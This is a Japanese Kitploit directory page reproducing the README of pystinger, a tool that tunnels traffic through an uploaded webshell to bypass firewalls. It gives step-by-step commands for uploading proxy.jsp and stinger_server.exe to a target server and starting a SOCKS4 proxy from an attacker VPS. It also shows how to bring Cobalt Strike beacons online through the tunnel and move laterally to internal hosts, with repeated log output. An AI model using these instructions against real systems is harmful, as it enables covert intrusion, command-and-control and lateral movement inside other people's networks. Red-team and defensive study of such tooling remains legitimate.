Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pystinger — Webshellを使用したファイアウォールバイパスによるトラフィック転送 | Kitploit
ツール/GitHubGitHub/funnywolf/pystinger
エクスプロイトフレームワークペイロード生成IDS/IPS回避横移動ウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubfunnywolf/pystinger

pystinger

Webshellを使用したファイアウォールバイパスによるトラフィック転送

リポジトリを見る
1.4k2044年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

pystinger

英語 | 简体中文

Pystinger は、webshell を介して SOCK4 プロキシ と ポートマッピング を実装します。

metasploit-framework、viper、cobalt strike で直接使用してセッションをオンラインにできます。

Pystinger は Python で開発されており、現在、php、jsp(x)、aspx の 3 つのプロキシスクリプトをサポートしています。

使用法

サーバーのドメイン名は http://example.com :8080 とします。サーバーの内部ネットワーク IP アドレスは 192.168.3.11 です。

SOCK4 プロキシ

  • proxy.jsp をターゲットサーバーにアップロードし、http://example.com:8080/proxy.jsp にアクセスできることを確認します。ページは UTF-8 を返します。
  • stinger_server.exe をターゲットサーバーにアップロードし、AntSword で cmd start D:/XXX/stinger_server.exe を実行して pystinger-server を起動します。

D:/xxx/singer_server.exe を直接実行しないでください。TCP 接続が切断されます。

  • VPS 上で ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 を実行します。
  • 次のような出力が表示されます。
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • VPS 127.0.0.1:60000 上に、example.com の内部ネットワーク向けの socks4a プロキシ が開始されました。
  • ターゲットサーバー (example.com) の 127.0.0.1:60020 が VPS の 127.0.0.1:60020 にマッピングされました。

cobaltstrike のビーコンを単一ターゲットでオンラインにする

  • proxy.jsp をターゲットサーバーにアップロードし、http://example.com:8080/proxy.jsp にアクセスできることを確認します。ページは UTF-8 を返します。
  • stinger_server.exe をターゲットサーバーにアップロードし、AntSword で cmd start D:/XXX/stinger_server.exe を実行して pystinger-server を起動します。

D:/xxx/singer_server.exe を直接実行しないでください。TCP 接続が切断されます。

  • VPS 上で ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 を実行します。
  • 次のような出力が表示されます。
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • cobaltstrike にリスナーを追加します。リスナーポートは 60020 (出力の RAT CONFIG の Handler/LISTEN ポート)、リスナーアドレスは 127.0.0.1 にします。
  • ペイロードを生成し、ターゲットにアップロードして実行します。

cobaltstrike のビーコンを複数ターゲットでオンラインにする

  • proxy.jsp をターゲットサーバーにアップロードし、http://example.com:8080/proxy.jsp にアクセスできることを確認します。ページは UTF-8 を返します。
  • stinger_server.exe をターゲットサーバーにアップロードし、AntSword で cmd start D:/XXX/stinger_server.exe 192.168.3.11 を実行して pystinger-server を起動します (192.168.3.11 はターゲットの内部ネットワーク IP アドレス)。

192.168.3.11 は 0.0.0.0 に変更可能です。

  • VPS 上で ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 を実行します。
  • 次のような出力が表示されます。
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • cobaltstrike にリスナーを追加します。リスナーポートは 60020 (出力の RAT CONFIG の Handler/LISTEN ポート)、リスナーアドレスは 192.168.3.11 にします。
  • ペイロードを生成し、ターゲットにアップロードして実行します。
  • 他のホストにラテラルムーブする場合、ペイロードを 192.168.3.11:60020 に向けてビーコンをオンラインにできます。

カスタムヘッダーとプロキシ

  • webshell が cookie や認証を必要とする場合、--header パラメータでリクエストヘッダーを設定できます。 --header "Authorization: XXXXXX,Cookie: XXXXX"

  • webshell をプロキシ経由でアクセスする必要がある場合、--proxy でプロキシを設定できます。 --proxy "socks5:127.0.0.1:1081"

関連ツール

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

テスト済み

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

更新履歴

2.0 更新日: 2019-09-29

  • Socks4 プロキシサービスをクライアントに移動

2.1 更新日: 2020-01-07

  • cobaltstrike のオンライン対応 (ポートマッピング)

開発は jetbrains のソフトウェアによってサポートされています。
https://www.jetbrains.com/?from=pystinger

ツールをダウンロード